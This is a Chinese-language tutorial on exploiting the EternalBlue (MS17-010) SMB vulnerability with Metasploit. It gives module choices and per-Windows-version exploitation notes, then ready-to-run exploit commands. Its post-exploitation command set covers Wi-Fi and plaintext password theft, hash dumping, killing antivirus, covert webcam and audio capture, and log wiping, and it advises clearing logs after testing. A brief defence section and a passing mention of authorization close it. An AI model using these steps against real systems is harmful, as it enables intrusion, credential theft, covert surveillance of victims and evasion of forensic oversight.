那些年,我们追过的“蓝”
字数 2144 2025-08-29 08:32:09
永恒之蓝(MS17-010)漏洞利用全面教学文档
一、永恒之蓝漏洞概述
永恒之蓝(EternalBlue)是利用Windows SMB协议中的漏洞(CVE-2017-0144)进行攻击的漏洞利用工具,对应微软安全公告MS17-010。该漏洞影响几乎所有Windows操作系统版本,包括Windows XP到Windows 10以及对应的服务器版本。
二、Metasploit中的利用模块
目前Metasploit框架中主要有三个利用永恒之蓝漏洞的模块:
-
exploit/windows/smb/enternalblue_doublepulsar
- 下载地址: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
- 早期模块,结合了DoublePulsar后门
-
exploit/windows/smb/ms17_010_eternalblue
- Kali官方最早支持的模块
- 对部分系统版本利用稳定
-
exploit/windows/smb/ms17_010_psexec
- 最新更新的模块
- 下载地址: https://github.com/rapid7/metasploit-framework/pull/9473
- 已被纳入Kali更新
三、环境准备与安装
- Kali Linux 2.0及以下版本需要手动安装该模块(或下载最新版Metasploit)
- 安装时需注意安装四个依赖模块
- 使用
reload_all命令验证安装是否成功,确保不报错
四、各Windows版本测试结果
1. Windows Server 2003 Enterprise Edition
- IP示例: 192.168.253.141
- 测试结果: 多次测试中稳定利用
2. Windows XP Professional
- IP示例: 192.168.253.136
- 测试结果: 多次测试中稳定利用
3. Windows 7 家庭普通版
- IP示例: 192.168.253.135
- 注意事项:
- 需指定SMBPass和SMBUser建立Windows命名管道
- 使用
exploit/windows/smb/ms17_010_eternalblue模块可被稳定利用
4. Windows Server 2008 R2 Datacenter
- IP示例: 192.168.253.135
- 注意事项:
- 需指定SMBPass和SMBUser建立Windows命名管道
- 使用
ms17_010_eternalblue模块时:- 部分Server 2008可被稳定利用
- 企业版利用不稳定,易导致蓝屏重启
5. Windows 8.1 Pro 9600/6.3
- IP示例: 10.0.21.160
- 测试结果:
- Windows 8.1 Pro 9600可以稳定利用
- 较高版本需要建立Windows命名管道
6. Windows Server 2012
- IP示例: 192.168.253.146
- 注意事项: 需指定SMBPass和SMBUser建立Windows命名管道
7. Windows 10
- IP示例: 192.168.253.145
- 测试结果:
- 部分老版本稳定利用
- 较新版本需指定SMBPass和SMBUser建立Windows命名管道
- 特殊发现: Windows 10 Home 10586版本无需建立Windows命名管道即可稳定利用
五、渗透测试实用命令集
以下命令在Windows 7 x64旗舰版(未更新最新补丁)测试环境中验证:
1. 信息收集
post/windows/wlan/wlan_profile- 读取无线连接的账号密码- 如执行失败可尝试替代方法:
netsh wlan show profiles
- 如执行失败可尝试替代方法:
wdigest- 抓取明文密码(需加载mimikatz模块)webcam_list- 查看是否有摄像头hashdump- 获取系统哈希值
2. 系统控制
killav- 杀掉杀毒软件vnc- 启动VNC连接screenshot- 对目标系统桌面进行截屏clearev- 清除系统日志
3. 多媒体控制
webcam- 启动摄像头webcam_snap -i 1 -v false- 启动摄像头拍摄一张照片(不打开闪光灯)sound_recorder- 启动声音录制
六、利用流程示例
-
选择适当的利用模块:
use exploit/windows/smb/ms17_010_psexec -
设置目标参数:
set RHOSTS 192.168.1.100 set SMBUser username set SMBPass password -
执行攻击:
exploit
七、注意事项
- 针对不同Windows版本需采用不同的利用策略
- 较新版本Windows通常需要提供有效的SMB凭据
- 服务器版本(特别是企业版)利用时可能导致系统不稳定
- 实际测试前应确保获得合法授权
- 测试后建议使用
clearev清理日志
八、防御建议
- 及时安装MS17-010补丁
- 禁用SMBv1协议
- 在网络边界阻止TCP 445端口
- 使用强密码策略
- 启用Windows防火墙并配置严格规则
本教学文档涵盖了永恒之蓝漏洞利用的关键知识点,包括模块选择、各系统版本差异、实用命令集和防御措施,可作为渗透测试参考指南使用。